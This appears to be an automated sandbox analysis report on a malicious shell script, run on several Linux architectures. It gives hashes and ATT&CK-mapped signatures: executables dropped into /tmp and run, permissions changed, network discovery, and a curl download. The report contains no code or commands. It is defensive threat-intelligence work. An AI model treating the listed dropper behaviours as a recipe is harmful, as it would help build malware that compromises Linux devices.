Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading /proc/sys/crypto/fips_enabled (process: curl)
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97